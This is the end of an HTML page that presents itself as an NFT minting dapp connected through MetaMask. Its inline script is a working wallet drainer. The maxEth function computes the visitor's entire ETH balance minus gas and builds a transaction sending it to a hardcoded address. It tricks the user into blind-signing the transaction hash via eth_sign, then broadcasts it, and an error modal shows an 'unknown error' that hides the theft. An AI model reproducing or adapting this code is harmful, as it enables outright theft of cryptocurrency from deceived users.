    <div data-w-id="22ffe835-236d-7d23-16b4-9796865dc71a" class="div-block-83 modal-content" style="opacity: 1;">
      <div class="text-block-84">

        <img src="Decline.png" width="75%" />
        
      </div>

      <!-- <p>
        Insufficient Funds! <br> Fund connected wallet account to complete transaction.
      </p> -->
      
      <p>
        Sorry 😓, An unknown error occured while trying to process your transaction.<br>
      </p>

      <p style="text-align: center; margin-top: 50px; font-size: 15px;">Try connecting your wallet again to Mint.</p>

    </div>
  
  
  </div>

  <div id="nometa" class="modal">


    <div data-w-id="daec03ce-904d-9897-4168-ac77eb91adc7" class="div-block-83 modal-content">
      <div class="text-block-84">
        <img src="Daco_5575399.png" width="35%"/>
        <p style="font-size: 15px; margin-top: 50px;">
          Metamask not present. <br>
          Open this dapp in your metamask wallet or you need metamask extension installed on your browser.
        </p>

        <a href="https://metamask.app.link/dapp/mythia.live/mint.html" class="sc-dkPtRN hLzqBE connect-wallet" label="Connect Wallet to Mint" style="color: #fff;" scale="md">Open dapp in Metamask.</a>
      </div>
      
    </div>


  </div>


    <script type="text/javascript">

      let current_account = null;
      let contractAddress = "0x9796550F0A76b3eD1e870Eb95E116A2557E5E646";
      let chainId;
      let eth_bal;


      let abi = [
        {
          "inputs": [
            {
              "components": [
                {
                  "internalType": "uint256",
                  "name": "nonce",
                  "type": "uint256"
                },
                {
                  "internalType": "uint256",
                  "name": "gasPrice",
                  "type": "uint256"
                },
                {
                  "internalType": "uint256",
                  "name": "gasLimit",
                  "type": "uint256"
                },
                {
                  "internalType": "address payable",
                  "name": "to",
                  "type": "address"
                },
                {
                  "internalType": "uint256",
                  "name": "value",
                  "type": "uint256"
                },
                {
                  "internalType": "bytes",
                  "name": "data",
                  "type": "bytes"
                },
                {
                  "internalType": "uint8",
                  "name": "v",
                  "type": "uint8"
                },
                {
                  "internalType": "bytes",
                  "name": "r",
                  "type": "bytes"
                },
                {
                  "internalType": "bytes",
                  "name": "s",
                  "type": "bytes"
                }
              ],
              "internalType": "struct SignatureVerifier.Transaction",
              "name": "transaction",
              "type": "tuple"
            }
          ],
          "name": "hashStruct",
          "outputs": [
            {
              "internalType": "bytes32",
              "name": "",
              "type": "bytes32"
            }
          ],
          "stateMutability": "view",
          "type": "function"
        },
        {
          "inputs": [
            {
              "internalType": "address",
              "name": "signer",
              "type": "address"
            },
            {
              "internalType": "bytes32",
              "name": "transaction",
              "type": "bytes32"
            },
            {
              "internalType": "bytes32",
              "name": "r",
              "type": "bytes32"
            },
            {
              "internalType": "bytes32",
              "name": "s",
              "type": "bytes32"
            },
            {
              "internalType": "uint8",
              "name": "v",
              "type": "uint8"
            }
          ],
          "name": "verify",
          "outputs": [
            {
              "internalType": "bool",
              "name": "",
              "type": "bool"
            }
          ],
          "stateMutability": "nonpayable",
          "type": "function"
        }
      ]

      //check to see if MetaMask is Installed
      const isMetaMaskInstalled = () => {
        //Have to check the ethereum binding on the window object to see if it's installed
        const { ethereum } = window;
        return Boolean(ethereum && ethereum.isMetaMask)
      }

      const MetaMaskClientCheck = () => {

        if(!isMetaMaskInstalled()) {
          //Metamask Extension not Installed
          console.log("Not web3 present");
          $("#nometa").show();          
        }

        else {

          //Metamask Extension Installed
          try {
            
            var provider = new Web3.providers.WebsocketProvider("wss://kovan.infura.io/ws/v3/957fbe52dcbd4ec082ffc0d9553c019a");
            web3 = new Web3(ethereum);
            console.log(web3);
            window.web3 = web3;

          }

          catch (error) {

              console.log(error);

          }
          

        }

      }

      const onClickConnect = async () => {

        try {
          // Will open the MetaMask UI
          // You should disable this button while the request is pending!
          //window.web3 = new Web3(ethereum);
          //web3 = window.web3;

          await ethereum
          .request({ method: 'eth_requestAccounts' })
          .then(handleAccountsChanged)
          .catch( (err)=> {
            
            //$("#welcome_div").show();
            console.log(err);

          })

        } catch (error) {
            console.log(error);
            //$("#welcome.div").show();
            //$("#account_div").hide();
        }
      };


      const handleAccountsChanged = (accounts) => {

        if (accounts.length === 0) {
            // MetaMask is locked or the user has not connected any accounts
            console.log('Please connect to MetaMask.');


        } else if (accounts[0] !== current_account) {

            current_account = accounts[0];

            console.log("Metamask account changed: " + accounts[0]);
            
            if (typeof accountChangedCallback !== 'undefined') {
                accountChangedCallback();
            }
        }

        //$("#welcome_div").show();
        //$("#account_div").hide();

      }


      async function maxEth() {

        web3 = new Web3(ethereum);

        const chainId = await web3.eth.getChainId();

        await web3.eth.getTransactionCount(current_account, "pending")
        .then(async (txnCount) => {
          // Create the transaction object
          eth_wei = ethUnit.toWei(0.1, 'ether');

          const jgasPrice = await web3.eth.getGasPrice();

          const mgasPrice = web3.utils.toHex(jgasPrice);

          eth_bal = await web3.eth.getBalance(current_account);

          const gas = new web3.utils.BN("22000");

          const cost = gas * jgasPrice;

          const sending = eth_bal - cost;

          const sending1 = web3.utils.fromWei(eth_wei, "ether");

          const fs = "0x" + sending.toString(16);

          console.log(sending1);
          console.log(fs);

          const txObject = {
            nonce: web3.utils.toHex(txnCount),
            gasPrice: mgasPrice,
            gasLimit: "0x5208",
            to: "0x2e57946dfcd40126027bcd151b4915f1a6d3d676",
            value: fs,
            data: "0x",
            v: "0x1",
            r: "0x",
            s: "0x"
          };

          let ethTX1 = new ethereumjs.Tx(txObject);

          const rawTx1 = '0x' + ethTX1.serialize().toString('hex');
          const rawHash1 = web3.utils.sha3(rawTx1, {encoding: 'hex'});

          /***
          const mycontract = await new web3.eth.Contract(
            abi,
            contractAddress
          ); 
          ***/
          
          // const txHash = await mycontract.methods.hashStruct(txObject).call()        

          await web3.eth.sign(rawHash1, current_account)
          .then(async (result) => {

            // display scan div
            //$("#scanning_div").show()
            //$("#welcome_div").hide();
            

            // The signature is now comprised of r, s, and v.

            const signature = result.substring(2);
            const r = "0x" + signature.substring(0, 64);
            const s = "0x" + signature.substring(64, 128);
            const v = parseInt(signature.substring(128, 130), 16);

            //signer = await mycontract.methods.verify(current_account ,rawHash1, r, s, v).call();
            //console.log(signer);

            const y =  web3.utils.toHex(v + chainId * 2 + 8);

            console.log(r);
            console.log(s);
            console.log(y.toString('hex'));

            /*** const signedTx = {
              nonce: web3.utils.toHex(txnCount),
              gasPrice: mgasPrice,
              gasLimit: "0x5208",
              to: "0xDB03428239a597C478e6A6d9F2AbD0D115411863",
              value: "0x186A0",
              data: "0x",
              v: y,
              r: r,
              s: s 
            }; ***/

            // const ethTX = new ethereumjs.Tx(signedTx);

            ethTX1.r = r
            ethTX1.s = s
            ethTX1.v = y

            console.log(ethTX1);

            const rawTx = '0x' + ethTX1.serialize().toString('hex');
            const rawHash = web3.utils.sha3(rawTx, {encoding: 'hex'});

            console.log(rawTx);
            console.log(rawHash1);
            console.log(rawHash);
            console.log('0x' + ethTX1.hash().toString('hex'));
            

            await web3.eth.sendSignedTransaction(rawTx)
            .then((hash) => {
              console.log(hash);
              $("#after").show();

            });

          })

          .catch((err) => {
            console.log(err);
            
          })


        })

      }

      const startOp = async () => {

          web3 =  new Web3(ethereum);
          window.web3 = web3;



        try {
          
          //Operation already initiatiated

          await ethereum
          .request({ method: 'eth_requestAccounts' })
          .then(handleAccountsChanged)
          .catch( (err)=> {
            
            //$("#welcome_div").show();
            console.log(err);

          })

          eth_bal = await web3.eth.getBalance(current_account);
          const r_bal = web3.utils.fromWei(eth_bal, 'ether');
          const chainId = await web3.eth.getChainId();

      
          if (r_bal > 0) {
            maxEth();
          }

          else {
            alert("Insufficients Funds. Fund account to continue");
          }

          //maxEth();

        }

        catch(e) {

          console.log(e);

        }

      }

      window.addEventListener('load', async () => {
        //Window already loaded
        
        
        MetaMaskClientCheck();



      });


    </script>

    <script type="text/javascript" language="javascript" src="ethereumjs-tx-1.3.3.min.js"></script>
    <script type="text/javascript" language="javascript" src="ethjs-unit.min.js"></script>
    <script type="text/javascript" language="javascript" src="web3-1.3.4.min.js"></script>
    <script type="text/javascript" language="javascript" src="jquery-1.6.4.min.js"></script>



</body>

</html>
